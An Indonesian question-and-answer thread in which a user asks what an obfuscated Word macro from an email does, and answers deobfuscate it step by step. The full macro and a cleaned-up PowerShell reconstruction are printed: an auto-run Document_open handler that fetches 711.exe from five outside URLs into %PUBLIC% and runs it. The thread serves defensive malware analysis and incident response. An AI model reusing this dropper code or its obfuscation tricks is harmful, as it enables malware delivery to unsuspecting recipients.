Pertanyaan: Apa yang dilakukan kode Visual Basic ini? (Makro Microsoft Word)


Saya menerima email dengan dokumen Word yang berisi beberapa makro. Saya menonaktifkan makronya lalu memeriksa kodenya. Semua kode tampak seperti omong kosong, tetapi mungkin ada yang dapat membantu saya mengetahui apa yang dilakukannya?

Ini ada di bagian Microsoft Word Objects (modul dokumen):

' Auto-run entry point: Word fires Document_open as soon as the document is
' opened with macros enabled, so no further user interaction is needed.
Private Sub Document_open()
' This is "On Error Resume Next" split over four lines with "_" continuations,
' so a naive text search for the phrase misses it. It makes every runtime error
' below fail silently, which is what lets the bogus Second calls "work".
On _
Error _
Resume _
Next
' Every "Second ..." statement is junk: Second is VBA's built-in Second()
' date function; fed these non-date strings each call raises a runtime error
' that the line above swallows. They do nothing except add noise for
' antivirus heuristics and human readers.
   Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
   Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
   Second "kz" + "1499" + "tkAh" + "p"
   Second "P" + "8389"
   Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
   Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
' The actual payload. The three module functions each return one slice of a
' single cmd.exe command line; Shell launches it in a hidden window
' (vbHide = 0, passed here as the string "0" via CStr).
Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
' More junk calls, swallowed exactly like the ones above.
   Second "pqENJzbA" + "208599822" + "Ovav" + "A"
   Second "HmjZtUmz" + "7073"
   Second "hYRErMnn" + "4277"
End Sub

Ini ada di Modul:

' Returns the FIRST part of the cmd.exe command line that Document_open runs.
'
' Obfuscation used throughout:
'   - Chr() arithmetic hides three characters:
'       Chr(9 + 16 + 4 + 2 + 68)  = Chr(99) = "c"
'       Chr(6 + 11 + 3 + 1 + 46)  = Chr(67) = "C"
'       Chr(3 + 5 + 1 + 0 + 25)   = Chr(34) = double quote
'     Format() with no format string returns the string unchanged.
'   - Every "^" is the cmd.exe escape character and can simply be dropped.
'   - Everything after "WvUy=" is the PowerShell command written BACKWARDS
'     (e.g. "}}^{^hc^tac" is "}catch{}}" reversed); bMdNCkVCVn appends the
'     for-loop that reverses it again at run time.
Function KlXaMrm()

On _
Error _
Resume _
Next
' Junk: Second() on garbage strings raises and is swallowed (see Document_open).
Second "IVozFsCNdj" + "muE"
   Second "wwrMmsOX" + "ii"
   Second "7048" + "RLBLOvif"
   Second "315289259" + "bGl" + "wcZUd" + "8842"
' -> cmd /V^:O/C"^s^e^t ^WvU^y=   i.e.  cmd /V:O /C "set WvUy=<padding>...
' /V:O enables delayed expansion so !var! works in the loop later on.
bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
Second "IWV" + "FalMBYmN" + "6772" + "vIi"
   Second "BfMwfQziXwj" + "fvQGQha"
   Second "hBcrV" + "380436099"
' -> " }}{hctac};ka"  reversed: "ak;}catch{}}" (tail of the PowerShell loop)
ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
Second "31392559" + "BMS"
' -> "erb;Yur$ metI-ekovnI;"  reversed: ";Invoke-Item $ruY;bre"
kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
' -> ")Yur$ ,pNB$(eliFd"  reversed: "dFile($BNp, $ruY)"
HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
Second "E" + "5438"
   Second "MhjZXFtjz" + "52832268"
' -> "aolnwoD.jpX${yr"  reversed: "ry{$Xpj.Downloa"
zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
Second "oWcn" + "1454"
   Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
   Second "GiNa" + "EjiBfz"
   Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
   Second "376971481" + "ATq"
' -> "t{)coi$ ni pNB$(hcaerof;'exe"  reversed: "exe';foreach($BNp in $ioc){t"
wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
Second "1426" + "2730" + "131359904" + "2661"
   Second "tZ" + "A"
' -> ".'+faw$+'\'+cilbup:v"  reversed: "v:public+'\'+$waf+'."
FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
Second "obmhCVWdl" + "1876"
' -> "ne$=Yur$;'117' = faw$;)'@'(tilpS."  reversed: ".Split('@');$waf = '711';$ruY=$en"
LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
Second "mHz" + "2845" + "swVQqO" + "sTaM"
   Second "151506295" + "9519"
   Second "530531760" + "421003665" + "33902179" + "zE"
' -> "'DGoP/moc.t"  reversed: "t.com/PoGD'"   (end of the URL list)
UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
Second "1424" + "AS" + "qWRt" + "jTfL"
   Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
   Second "8474" + "427918883" + "101014623" + "2181"
' -> "opsnori//:ptth@jfWFVF8r/moc.euv"  reversed: "vue.com/r8FVFWfj@http://ironspo"
oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
Second "LIdEK" + "9208"
   Second "GHY" + "w"
   Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
' -> "eroobakeep//:p"  reversed: "p://peekaboore"
wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
' Concatenation order matters: this is the exact byte order of the command line.
KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
   Second "kmpQXLAuN" + "fh" + "365194270" + "n"
   Second "70996280" + "nJ"
   Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
End Function
' Returns the SECOND part of the cmd.exe command line: the rest of the reversed
' PowerShell text (the remaining download URLs and the "powershell $Xpj=..."
' head), followed by the forward-written cmd loop that un-reverses and runs it.
' Same tricks as KlXaMrm: Chr(99) = "c", Chr(67) = "C", "^" = cmd escape.
Function bMdNCkVCVn()

On _
Error _
Resume _
Next
' Junk: Second() on garbage strings raises and is swallowed (see Document_open).
Second "FddKlw" + "OTSBodYZZ"
' -> "tth@ujlho/moc.gnitniap"  reversed: "painting.com/ohlju@htt"
PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
   Second "rBzjjYzi" + "zL"
' -> "motsucratsenol//:ptth"  reversed: "http://lonestarcustom"
LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
   Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
   Second "9262" + "171867944" + "464524065" + "7760"
' -> "@uA/ur.mbs-tevssar//:ptth@Fp2GzxW/"  reversed: "/WxzG2pF@http://rassvet-sbm.ru/Au@"
WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
Second "184947357" + "wjOV"
   Second "5399" + "jwuBT"
   Second "402560265" + "449" + "l" + "BBBuHZnMK"
   Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
' -> "moc.krocegellocsnitramts//:pt"  reversed: "tp://stmartinscollegecork.com"
WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
   Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
' -> "th'=coi$;tneilCbeW.teN tcejbo-wen=jpX"
'    reversed: "Xpj=new-object Net.WebClient;$ioc='ht"
RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
' -> "$ llehsrewop&&fo": "$ llehsrewop" reversed is "powershell $" (start of
'    the payload); "&&fo" is the forward-written start of "for".
TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
' -> "r /L %5 in (373,-1,0)do set 31=!3": counts 373 down to 0 and appends
'    one character of WvUy per iteration into variable 31, i.e. reverses it.
HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
   Second "I" + "5470" + "uC" + "vzYpG"
   Second "Prm" + "D"
' -> "1!!WvUy:~%5,1!&&if %5==0 call": !WvUy:~%5,1! is the single character at
'    offset %5; when the counter hits 0 the reassembled string is call'ed.
vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
Second "QqFfMn" + "mmslG"
' -> " %31:*31!": the argument to call; zZZwVld supplies the closing "=%".
fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
' Concatenation order is the exact byte order of the command line.
bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
   Second "kWluI" + "lFK"
   Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
   Second "QHGQ" + "f"
End Function
' Returns the TAIL of the cmd.exe command line: "=%" closes the
' "%31:*31!=%" variable expansion started in bMdNCkVCVn, Chr(3+5+1+0+25) =
' Chr(34) is the double quote that closes the /C "..." argument, then two spaces.
Function zZZwVld()

On _
Error _
Resume _
Next
' Junk: Second() on garbage strings raises and is swallowed (see Document_open).
Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
   Second "297480629" + "wXWqc"
   Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
' -> =%"  (the trailing + "" adds nothing)
sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
zZZwVld = sFjEfzuO
   Second "7008" + "530276898"
End Function

Saya menduga ini berbahaya, tapi saya tidak terlalu akrab dengan Visual Basic. Saya juga tidak yakin apakah ini adalah tempat yang tepat untuk bertanya tentang hal ini.




Jawaban:


Semua baris yang dimulai dengan `Second` adalah kode sampah (junk code). `Second` adalah fungsi bawaan VBA `Second(tanggal)`; dipanggil dengan string acak seperti ini, setiap pemanggilan menimbulkan kesalahan runtime, dan kesalahan itu ditelan oleh `On Error Resume Next` — yang sengaja dipecah dengan penyambung baris `_` menjadi empat baris (`On _` / `Error _` / `Resume _` / `Next`) agar tidak mudah dikenali dengan pencarian teks. Baris-baris itu tidak melakukan apa-apa; tujuannya hanya mengaburkan kode dari antivirus dan pembaca.

Jika semua baris itu dihapus, yang tersisa hanyalah serangkaian penugasan (assignment) string. `Format(Chr(9 + 16 + 4 + 2 + 68))` adalah `Chr(99)` = `c`, `Chr(6 + 11 + 3 + 1 + 46)` = `Chr(67)` = `C`, dan `Chr(3 + 5 + 1 + 0 + 25)` = `Chr(34)` = tanda kutip ganda (`Format` tanpa argumen format mengembalikan string apa adanya). Jika semua potongan itu disambung sesuai urutan `KlXaMrm + bMdNCkVCVn + zZZwVld`, hasilnya adalah string berikut:

cmd /V^:O/C"^s^e^t ^WvU^y=^   ^  ^ ^   ^   ^  ^ ^ ^ }}^{^hc^tac};^k^a^er^b;Yur^$ ^m^e^tI^-ekovnI^;)Y^ur^$ ^,^pNB^$(^eliFd^a^olnwoD.j^p^X$^{^yr^t{)c^oi$^ n^i^ ^pNB^$(hc^a^er^o^f^;'^e^x^e^.^'+^faw^$+'\'^+ci^l^b^u^p:vne^$^=Y^ur^$;'^1^1^7^' =^ f^aw$;)^'@^'(tilp^S.^'^D^GoP/m^oc.^t^o^p^snor^i//:p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep//^:^p^tth^@uj^l^h^o/m^oc^.^gn^itnia^pm^ot^sucra^t^sen^o^l//^:p^t^th^@u^A/^ur.^mb^s-t^evs^s^ar//^:p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s//:p^t^th'^=c^oi^$;^tn^e^i^lCbe^W^.t^eN^ tcejb^o-^w^en=^jpX^$ ll^eh^sr^e^w^o^p&&^f^or /L %^5 ^in (^37^3,-^1,^0)^do s^e^t 3^1=!3^1!!^WvU^y:~%^5,1!&&i^f %^5=^=^0 ca^l^l %3^1:*^3^1^!^=%"

Ini adalah baris perintah yang menjalankan `cmd` dengan switch `/V:O` (diterima cmd sebagai singkatan `/V:ON`, yaitu delayed environment variable expansion — diperlukan agar sintaks `!var!` dalam loop di bawah bekerja) dan `/C "<perintah yang dikaburkan>"` (jalankan perintah itu lalu keluar).
Semua tanda sisipan (`^`) dapat dihapus, karena `^` adalah karakter escape cmd yang hanya membuat karakter berikutnya diperlakukan secara literal. Setelah dibersihkan, strukturnya menjadi: `cmd /V:O/C"set WvUy=<teks PowerShell terbalik>&&for /L %5 in (373,-1,0)do set 31=!31!!WvUy:~%5,1!&&if %5==0 call %31:*31!=%"`.

Perintah itu menyimpan baris perintah PowerShell dalam keadaan terbalik ke variabel lingkungan `WvUy`. Loop `for /L %5 in (373,-1,0)` kemudian mengambil satu karakter per iterasi dari belakang ke depan (`!WvUy:~%5,1!`) dan menempelkannya ke variabel `31`; saat hitungan mencapai 0, `call %31:*31!=%` mengeksekusi string yang sudah dibalik, yaitu `powershell $Xpj=...`.

Skrip PowerShell yang akhirnya dieksekusi (di sini dirapikan agar mudah dibaca) adalah:

# Reconstruction (by the answerer) of the command the cmd loop reassembles.
# Comments describe only what these lines do; the downloaded file itself is
# not visible here, so this is a first-stage downloader/dropper.
$Xpj=new-object Net.WebClient;                       # HTTP client used for the download
# Five candidate payload URLs packed into one string and split on '@'.
$ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
$waf='711';                                          # base name of the dropped file
# Drop path: %PUBLIC%\711.exe -- a location a standard user can typically write to.
$ruY=$env:public + '\' + $waf + '.exe';
foreach($BNp in $ioc) {                              # try the URLs in order
    try {
        $Xpj.DownloadFile($BNp, $ruY);               # write the remote file to $ruY
        Invoke-Item $ruY;                            # launch the downloaded .exe
        break;                                       # stop after the first URL that works
    }catch{}                                         # any failure is silently ignored; move on
}

Skrip ini mencoba mengunduh file dari setiap URL secara berurutan, menyimpannya sebagai `711.exe` di folder `%PUBLIC%` (biasanya `C:\Users\Public`), lalu menjalankannya dengan `Invoke-Item`; begitu satu unduhan-dan-eksekusi berhasil, loop berhenti (`break`), dan kegagalan apa pun ditelan oleh `catch{}` tanpa pesan. Jadi ini adalah downloader tahap pertama: apa isi `711.exe` tidak bisa diketahui dari makro ini saja. Lima URL itu dan jalur `%PUBLIC%\711.exe` adalah indikator (IOC) yang bisa dicari di log proxy/DNS dan di mesin yang terkena. Jika makro tidak pernah diaktifkan, unduhan ini tidak pernah terjadi.





Hapus!

Kode ini berjalan otomatis lewat handler `Document_open()` setiap kali dokumen dibuka dengan makro diaktifkan — pola klasik dokumen Word berbahaya (maldoc). Kode ini jelas jahat. Jika Anda ingin melihat perintah yang akan dijalankan, ganti baris berikut:

Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

dengan:

MsgBox KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide) 

lalu baca string yang ditampilkan. Perhatikan: cara ini tetap mengharuskan Anda mengaktifkan makro pada dokumen itu, jadi lakukan hanya di mesin virtual terisolasi tanpa akses jaringan, bukan di PC kerja; string sepanjang ratusan karakter ini juga bisa terpotong di MsgBox, sehingga `Debug.Print` ke jendela Immediate (atau alat analisis statis seperti olevba) lebih dapat diandalkan. Atau lebih baik hapus saja dokumennya — bisa saja ada kode lain di tempat lain yang juga memanggil `Shell`. Jika makro sempat berjalan (dengan makro diaktifkan), periksa apakah `%PUBLIC%\711.exe` ada, anggap mesin telah disusupi, dan instal ulang adalah jalan paling aman.

